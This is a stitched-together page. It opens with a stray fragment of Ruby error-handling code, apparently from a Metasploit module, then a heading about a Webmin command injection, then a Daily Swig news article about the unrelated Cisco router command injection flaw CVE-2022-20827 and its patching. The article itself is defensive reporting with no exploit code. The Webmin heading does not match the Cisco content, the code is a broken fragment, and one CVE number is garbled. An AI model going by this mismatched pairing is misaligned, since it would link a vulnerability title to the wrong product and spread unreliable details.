::Rex::ConnectionError    fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")  endend

Webmin Package Updates Command Injection

Vulnerable path is reachable just once a day, but patches still need to be implemented as a matter of priority

James Walker 10 August 2022 at 12:52 UTC

Vulnerable path is reachable just once a day, but patches still need to be implemented as a matter of priority

A high-impact vulnerability in small business routers from Cisco could allow “patient and suitably positioned attackers” to obtain unauthenticated remote code execution on affected devices.

The flaw was discovered by researchers at Onekey (formerly IoT Inspector), who found that improper input validation in the Cisco RV160, RV260, RV340, and RV345 series of routers could allow a remote attacker to execute arbitrary commands on the system.

“By sending a specially-crafted input to the web filter database update feature, an attacker could exploit this vulnerability to execute arbitrary commands on the underlying operating system with root privileges,” the team said in a technical blog post this week.

**Perfect timing**

Tracked as CVE-2022-20827 and with a CVSS score of 9.0, the Cisco router vulnerability relates to a flaw in the BrightCloud web filtering feature that comes bundled with the devices.

The researchers discovered the vulnerability when hunting for bugs to craft exploit chains for the Pwn2Own 2021 live hacking event.

**RELATED** Vulnerability in DrayTek routers leaves thousands of SMEs open to exploitation

“Sadly, the vulnerable path is only reachable once a day, so it did not match the Pwn2Own rules,” they said.

Despite the timing constraints, Onekey said businesses should still implement the fixes as soon as possible. “We know real world attackers can be patient and won’t hesitate to wait on you, so patch your routers,” they said.

**Bug ‘dependency’ confusion**

In an accompanying security advisory, Cisco released a list of vulnerable router firmware versions and relevant patch guidance.

Incidentally, the advisory states that CVE-222-20827 is “dependent” on another flaw, CVE-2022-20841.

Read more of the latest infosec research news

However, despite noting similarities in the exploits, Onekey researcher Quentin Kaiser told _The Daily Swig_ that one CVE was not reliant on the other.

“I don’t see the ‘dependency’ between those two vulnerabilities,” Kaiser said. “They’re similar in that they’re both exploiting a lack of protection against man-in-the-middle attacks, but they target different components.”

We have asked Cisco for clarification on this point. This article will be updated if we hear back.

**RECOMMENDED** Microsoft Edge deepens defenses against malicious websites with enhanced security mod

Tag

#rce